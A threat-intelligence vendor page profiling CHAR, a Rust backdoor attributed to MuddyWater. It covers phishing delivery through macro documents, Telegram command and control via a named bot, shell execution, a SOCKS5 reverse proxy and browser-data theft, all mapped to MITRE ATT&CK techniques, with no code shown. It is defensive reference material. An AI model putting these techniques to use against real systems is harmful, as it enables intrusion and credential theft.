Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 2 actors

CHAR

CHAR is a Rust-based backdoor associated with the Iranian state-linked threat actor MuddyWater, including activity tracked as Operation Olalampo. Reporting places its use from at least January 2026 in campaigns primarily targeting organizations and individuals in the Middle East and North Africa, with broader reporting linking MuddyWater targeting to sectors including energy, maritime, diplomatic, financial, telecom, and critical infrastructure. In documented attack chains, CHAR was delivered via phishing emails with malicious Microsoft Office or Excel documents that relied on macro execution; reporting also states MuddyWater exploited recently disclosed vulnerabilities on public-facing servers for initial access during the same campaign. CHAR uses Telegram for command and control via the bot identified as stager_51_bot, also described as the Telegram bot with first name "Olalampo." Its confirmed capabilities include changing directories and executing cmd.exe or PowerShell commands. Reported PowerShell tasking included execution of a SOCKS5 reverse proxy, another backdoor named Kalim, browser-data theft/upload activity, and running executables named sh.exe and gshdoc_release_X64_GUI.exe. Multiple sources describe CHAR as part of a broader MuddyWater toolset alongside GhostFetch, HTTP_VIP, GhostBackDoor, RustyWater, Phoenix, and Fooder loader. Group-IB reported signs of possible AI-assisted development in CHAR-related tooling, specifically emojis in debug strings, and noted structural similarities to the Rust-based BlackBeard malware family, also referred to as Archer RAT and RUSTRIC.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
MuddyWater

MuddyWater's Operation Olalampo deployed... CHAR, a Rust-based backdoor controlled via Telegram bot stager_51_bot...

via centripetal threat researchcentripetal.ai
Muddy Water

stager_51_bot Telegram Bot C2 Muddy Water (CHAR backdoor)

via halcyon attacks lookouthalcyon.ai
MITRE ATT&CK

Techniques & procedures

23 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566PhishingEvidence2

From February to July 2024, more than 50 phishing emails were observed across 10+ sectors with hundreds of recipients.

T1566.001Spearphishing AttachmentEvidence6

Initial Access: Spear-phishing with malicious Word docs/VBA macros (T1566.001), macro execution (T1204.002).

Execution

4 techniques
T1059Command and Scripting InterpreterEvidence2

"GhostBackDoor... supports an interactive shell"; "...retrieve instructions to start an interactive shell"

T1059.001PowerShellEvidence2

Execution & Persistence: PowerShell/PowerGoop, Rust-based implants (RustyWater/CHAR/Archer RAT), registry Run keys, scheduled tasks (T1059.001, T1547.001).

T1059.003Windows Command ShellEvidence1

"change directory and execute a cmd.exe ... command"

T1204.002Malicious FileEvidence5

Initial Access: Spear-phishing with malicious Word docs/VBA macros (T1566.001), macro execution (T1204.002).

Persistence

1 technique
T1547.001Registry Run Keys / Startup FolderEvidence1

Execution & Persistence: PowerShell/PowerGoop, Rust-based implants (RustyWater/CHAR/Archer RAT), registry Run keys, scheduled tasks (T1059.001, T1547.001).

Privilege Escalation

2 techniques
T1055Process InjectionEvidence1

The RustyWater implant and the CHAR backdoor represent the apex of this evolution, incorporating asynchronous C2 communication, process injection, layered encryption

T1547.001Registry Run Keys / Startup FolderEvidence1

Execution & Persistence: PowerShell/PowerGoop, Rust-based implants (RustyWater/CHAR/Archer RAT), registry Run keys, scheduled tasks (T1059.001, T1547.001).

Stealth

3 techniques
T1027Obfuscated Files or InformationEvidence1

Defense Evasion: Obfuscation, reflective loading, disabling security tools, living-off-the-land (T1027, T1620, T1562).

T1055Process InjectionEvidence1

The RustyWater implant and the CHAR backdoor represent the apex of this evolution, incorporating asynchronous C2 communication, process injection, layered encryption

T1620Reflective Code LoadingEvidence1

Defense Evasion: Obfuscation, reflective loading, disabling security tools, living-off-the-land (T1027, T1620, T1562).

Credential Access

2 techniques
T1539Steal Web Session CookieEvidence1

"...upload data stolen from web browsers..."

T1555.003Credentials from Web BrowsersEvidence1

Credential Access & Collection: Browser credential dumping, system info gathering (T1555.003, T1082).

Discovery

1 technique
T1082System Information DiscoveryEvidence1

Credential Access & Collection: Browser credential dumping, system info gathering (T1555.003, T1082).

Command and Control

8 techniques
T1071Application Layer ProtocolEvidence1

Sekoia TDR (July 2024) independently documented the same implant under the name MuddyRot, with matching characteristics: mutex “DocumentUpdater,” TCP port 443, and identical string obfuscation logic.

T1071.001Web ProtocolsEvidence2

TWINTALK, a C2 orchestrator that beacons via JWT-authenticated HTTPS with randomized delays (108–180 seconds).

T1071.005Publish/Subscribe ProtocolsEvidence1

Excel lure (energy/maritime company) -> CHAR (Rust backdoor with Telegram C2).

T1090ProxyEvidence1

"PowerShell command is designed to execute a SOCKS5 reverse proxy"

T1090.003Multi-hop ProxyEvidence2

Command and control operates through Telegram dead drops, JWT-authenticated HTTPS with randomized URI paths, and Cloudflare-fronted infrastructure that masks backend servers from conventional blocking.

T1102Web ServiceEvidence2

"Char, a Rust-based backdoor controlled via a Telegram bot"

T1102.001Dead Drop ResolverEvidence1

Command and control operates through Telegram dead drops, JWT-authenticated HTTPS with randomized URI paths, and Cloudflare-fronted infrastructure that masks backend servers from conventional blocking.

T1102.002Bidirectional CommunicationEvidence2

"CHAR , a Rust backdoor that's controlled by a Telegram bot..."

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence2

Command & Control / Exfiltration: Custom C2 (HTTP, encrypted channels), data staging (T1071.001, T1041).

Other

1 technique
T1562Impair DefensesEvidence1

Defense Evasion: Obfuscation, reflective loading, disabling security tools, living-off-the-land (T1027, T1620, T1562).

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app3 months ago
ACTIVITY FEED

Recent activity

18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

18 SOURCESView more in app
centripetal threat researchNews
Mar 20, 2026
Pre-Positioned Access: The Cyber Threat Behind the Iran… | Centripetal

A Rust-based backdoor used by MuddyWater and controlled through a Telegram bot; debug strings suggest AI-assisted code generation.

Read more
breakglass intelNews
Mar 12, 2026
MuddyWater's "mazafakaerindahouse" Campaign: An 873-Byte Python Dropper, 6 OPSEC Failures, and a Russian Cybercrime False Flag - Breakglass Intelligence - Breakglass Intelligence

Named tool/malware referenced as part of MuddyWater's Operation Olalampo in January 2026.

Read more
infosec writeupsNews
Mar 9, 2026
CTI Research: MuddyWater/Seedworm (Mango Sandstorm) | by Andrey Pautov | Mar, 2026 | InfoSec Write-ups

A Rust backdoor with Telegram-based command and control used in Operation Olalampo.

Read more
osint team blogNews
Mar 8, 2026
Ukraine, Iran, and the New Sequencing of Hybrid War | by SIMKRA | Mar, 2026 | OSINT Team

A Rust-based backdoor attributed in the article to MuddyWater activity, aligned with stealthy access, persistence, and covert C2 (noted as Telegram-based in the campaign description).

Read more
+14 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping23

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.